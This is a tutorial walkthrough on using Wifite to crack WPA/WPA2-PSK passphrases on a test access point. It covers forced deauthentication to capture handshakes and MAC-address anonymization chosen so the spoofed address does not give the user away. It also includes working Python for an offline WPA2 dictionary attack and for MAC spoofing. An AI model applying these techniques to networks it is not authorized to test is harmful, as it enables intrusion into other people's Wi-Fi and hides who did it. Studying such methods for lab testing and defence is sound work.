This second part of the Wifite walkthrough looks at cracking access points that use WPA-PSK or WPA2-PSK.
If you have used tools like airodump-ng and aircrack-ng to crack WPA access points before, you will know that a captured WPA four-way handshake is required to crack a WPA-PSK network: the passphrase is never sent over the air, so the dictionary attack is run offline against the handshake. More details on the WPA four-way handshake can be found on Wikipedia.
Previous article: Wifite walkthrough Part 1
As mentioned in the previous article, some versions of Wifite have a bug that makes aireplay-ng fail and Wifite report an error like "aireplay-ng terminated unexpectedly". The fix is a small change to the Wifite source, which is a single Python script located at /usr/bin/wifite. Install a text editor such as gedit (apt-get install gedit), open the script with gedit /usr/bin/wifite, and replace every occurrence of cmd = ['aireplay-ng', with cmd = ['aireplay-ng', '--ignore-negative-one', so that each aireplay-ng invocation is passed the --ignore-negative-one flag. Save the file and run Wifite again.
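The same replacement can be scripted rather than done by hand in gedit. The following is an added example, not code from the original article or from the Wifite project; it assumes the script lives at /usr/bin/wifite as stated above and uses a constructed SAMPLE string as a stand-in for the real source so that it runs offline. It keeps a .bak copy and skips call sites that already carry the flag, so running it twice is harmless.

```python
# Added example (not code from the original article or from the Wifite
# project): apply the --ignore-negative-one fix to the wifite script
# programmatically instead of editing it by hand in gedit. Assumptions: the
# script path defaults to /usr/bin/wifite as the article states, and the
# SAMPLE text below is a constructed stand-in for the real source so the
# example runs offline.
import re
import shutil
from typing import Tuple

# Start of every aireplay-ng argument list in the wifite source.
_PATTERN = re.compile(r"cmd = \['aireplay-ng',")
_FIXED = "cmd = ['aireplay-ng', '--ignore-negative-one',"


def patch_source(text: str) -> Tuple[str, int]:
    """Return (patched text, number of call sites changed).

    Call sites that already pass --ignore-negative-one are left alone, so
    running the patch twice changes nothing the second time.
    """
    count = 0
    out = []
    for line in text.splitlines(keepends=True):
        if _PATTERN.search(line) and "--ignore-negative-one" not in line:
            line = _PATTERN.sub(_FIXED, line)
            count += 1
        out.append(line)
    return "".join(out), count


def patch_file(path: str = "/usr/bin/wifite") -> int:
    """Patch the script in place, keeping a .bak copy so it can be reverted."""
    shutil.copy2(path, path + ".bak")
    with open(path, encoding="utf-8") as fh:
        patched, count = patch_source(fh.read())
    if count:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(patched)
    return count


# Constructed sample resembling the affected lines; not the real wifite source.
SAMPLE = (
    "cmd = ['aireplay-ng',\n"
    "       '-0', '1',\n"
    "cmd = ['airodump-ng', '-c', channel]\n"
    "cmd = ['aireplay-ng', '--ignore-negative-one', '-1', '0']\n"
)

if __name__ == "__main__":
    patched_text, changed = patch_source(SAMPLE)
    print(f"changed {changed} call site(s):\n{patched_text}")
```

Run `patch_file()` as root to patch the installed script; `patch_source` is kept separate so the transformation can be checked on a string before touching /usr/bin/wifite.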
To make Wifite target only WPA networks, run it with the -wpa option, and give it a dictionary file with the -dict option; Wifite uses that file to crack the passphrase once a handshake has been captured. On Kali Linux, wordlists are stored in /usr/share/wordlists. Wifite then starts scanning for WPA access points.
Press Ctrl+C to stop the scan and enter the number of the target. In my case the target number is 2, which is the access point I configured for testing; it uses WPA2-PSK with the passphrase "password".
Wifite now listens for the handshake. Once it has captured one, it automatically starts cracking the passphrase with the dictionary file we supplied.
As you can see, Wifite has successfully recovered the access point passphrase.
Sometimes things do not go so smoothly. The four-way handshake is only exchanged when a client associates with the access point, so to capture it a client must connect (or reconnect) while we are monitoring the network; a client that is already connected and stays connected produces no handshake. Wifite handles this by sending deauthentication packets, either to a specific client or as a broadcast if requested, which forces connected clients to reconnect so that the handshake can be captured. The interval between deauthentication packets can be set with the -wpadt parameter.
You can also choose which tool Wifite uses once the four-way handshake has been captured. aircrack-ng is the default; cowpatty, pyrit or tshark can be selected instead. Note that tshark cannot crack a passphrase at all: in the classic Wifite script these selections control which tool is used to verify that a valid handshake is present in the capture, and the dictionary attack itself is run with aircrack-ng. Check the help output of your version before relying on a particular cracker.
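To see what the cracking tool actually does with the handshake and the dictionary, here is the per-candidate computation of a WPA2-PSK dictionary attack. This is an added example, not code from the original article, from Wifite or from aircrack-ng; the SSID, MAC addresses, nonces and EAPOL message 2 are constructed in the block, and the frame's MIC is computed from the correct passphrase ("password", as on the test access point above) so that the example runs offline against a small constructed wordlist.

```python
# Added example, not code from the original article, from Wifite or from
# aircrack-ng: the computation a dictionary attack on a captured WPA2-PSK
# four-way handshake performs for every candidate passphrase, which is what
# the cracking tool does with the capture Wifite hands it. The handshake
# (SSID, MAC addresses, nonces, EAPOL message 2) is constructed inline and
# its MIC is computed from the correct passphrase so the example runs offline.
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    This is the slow step, and the reason wordlist size and speed matter."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """The KCK (first 128 bits of the PTK) is all that is needed to check a MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    The MIC sits at bytes 81..96: 4-byte EAPOL header + 77 bytes of key descriptor."""
    zeroed = frame[:81] + b"\x00" * 16 + frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, frame, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MIC matches the captured frame, else None."""
    captured_mic = frame[81:97]
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:
            continue  # WPA-PSK passphrases are 8..63 characters; skip junk early
        kck = derive_kck(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (RSN descriptor, key info 0x010a, no key data)."""
    descriptor = (
        b"\x02" + b"\x01\x0a" + b"\x00\x10"   # type RSN, key info (MIC|pairwise|v2), key length
        + (1).to_bytes(8, "big")              # replay counter
        + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, key ID
        + mic + b"\x00\x00"                   # MIC, key data length
    )
    return b"\x01\x03" + len(descriptor).to_bytes(2, "big") + descriptor


# Constructed handshake parameters (stand-ins for what airodump-ng would capture).
SSID = "testnet"
AP_MAC = bytes.fromhex("00c0ca112233")
STA_MAC = bytes.fromhex("001122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "password"   # the passphrase the article's test AP uses
WORDLIST = ["123456", "letmein!", "Password1", "password", "qwertyuiop"]  # constructed


def sample_handshake_frame() -> bytes:
    """Message 2 with a MIC computed from TRUE_PASSPHRASE."""
    kck = derive_kck(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


if __name__ == "__main__":
    print("recovered:", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, sample_handshake_frame(), WORDLIST))
```

Two things worth noting from the code: the PBKDF2 step depends on the SSID, so precomputed tables only help for one network name, and the MIC check needs just the KCK, so the full PTK is never derived during cracking. A real capture needs message 2 (or messages 3/4) plus the nonces from the other side; aircrack-ng extracts these from the pcap that Wifite saves.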
Another useful option in Wifite is -mac, which anonymizes your MAC address. Changing the MAC address of an interface is trivial with a few commands or with the macchanger utility, but it is convenient to have the feature in the tool itself. For this to work, the interface whose address you want to change must be in managed mode; if it was previously put into monitor mode, take it out of monitor mode first. Use the iwconfig command to see which interfaces are in monitor mode, then remove them with airmon-ng stop <interface-name>. As the image below shows, the mon0 interface is in monitor mode.
So let's take it down with the command airmon-ng stop mon0.
Now we can add the -mac option to anonymize the MAC address. Wifite is smart enough to change the address to one that resembles the interface's existing address (it keeps the first three octets, the vendor OUI, and randomizes the last three) rather than something ridiculous like AA:BB:CC:DD:EE:FF, which would give you away.
And when you stop the capture, Wifite restores the original MAC address.
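The OUI-preserving change described above is easy to reproduce and check outside Wifite. The block below is an added example, not code from the original article or from Wifite; it assumes the new address keeps the first three octets (the vendor OUI) of the old one and randomizes the last three, and that the address is applied with `ip link`, which is available on Kali Linux. The addresses and the interface name wlan0 are constructed examples.

```python
# Added example (not code from the original article or from Wifite): how an
# OUI-preserving MAC change of the kind the article describes can be generated,
# sanity-checked and applied. Assumptions: the new address keeps the first
# three octets (the vendor OUI) of the old one and randomises the last three,
# and the address is applied with `ip link`, which is available on Kali Linux.
# The addresses below are constructed examples.
import random
import re
import subprocess
from typing import List, Optional

_MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def normalise_mac(mac: str) -> str:
    """Lower-case, colon-separated form; raises ValueError on anything else."""
    mac = mac.strip().lower().replace("-", ":")
    if not _MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return mac


def random_mac_same_oui(old_mac: str, rng: Optional[random.Random] = None) -> str:
    """Keep the OUI of old_mac and randomise the device-specific last 24 bits,
    so the result still looks like a card from the same vendor."""
    if rng is None:
        rng = random.SystemRandom()
    oui = normalise_mac(old_mac)[:8]
    tail = ":".join(f"{rng.randrange(256):02x}" for _ in range(3))
    return f"{oui}:{tail}"


def same_oui(a: str, b: str) -> bool:
    return normalise_mac(a)[:8] == normalise_mac(b)[:8]


def is_unicast(mac: str) -> bool:
    """The I/G bit (LSB of the first octet) must be 0 for a usable source address;
    keeping the OUI of a real card guarantees this."""
    return int(normalise_mac(mac)[:2], 16) & 1 == 0


def mac_change_commands(iface: str, new_mac: str) -> List[List[str]]:
    """The ip link sequence for changing an address: the interface must be down
    while the address is set. It must also be in managed mode, as the article
    notes, so stop any monitor interface (airmon-ng stop mon0) first."""
    new_mac = normalise_mac(new_mac)
    return [
        ["ip", "link", "set", "dev", iface, "down"],
        ["ip", "link", "set", "dev", iface, "address", new_mac],
        ["ip", "link", "set", "dev", iface, "up"],
    ]


def set_mac(iface: str, new_mac: str, dry_run: bool = True) -> List[List[str]]:
    """Apply the command sequence (needs root); with dry_run just return it."""
    cmds = mac_change_commands(iface, new_mac)
    if not dry_run:
        for cmd in cmds:
            subprocess.run(cmd, check=True)
    return cmds


if __name__ == "__main__":
    original = "00:c0:ca:12:34:56"
    spoofed = random_mac_same_oui(original)
    print(original, "->", spoofed)
    for cmd in set_mac("wlan0", spoofed):    # dry run
        print(" ".join(cmd))
    for cmd in set_mac("wlan0", original):   # restore, as Wifite does on exit
        print(" ".join(cmd))
```

`random.SystemRandom` draws from the OS entropy source, so the last three octets are not predictable from a PRNG seed; `dry_run` defaults to True so the command list can be inspected before anything is executed as root.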
In this article we looked at how Wifite can be used to crack networks protected with WPA-PSK or WPA2-PSK. Wifite is good at what it does and automates almost everything, but it is important to understand how it drives airodump-ng, aireplay-ng, aircrack-ng and the other tools to accomplish its tasks. I recommend reading through the Wifite source code to see how it is done.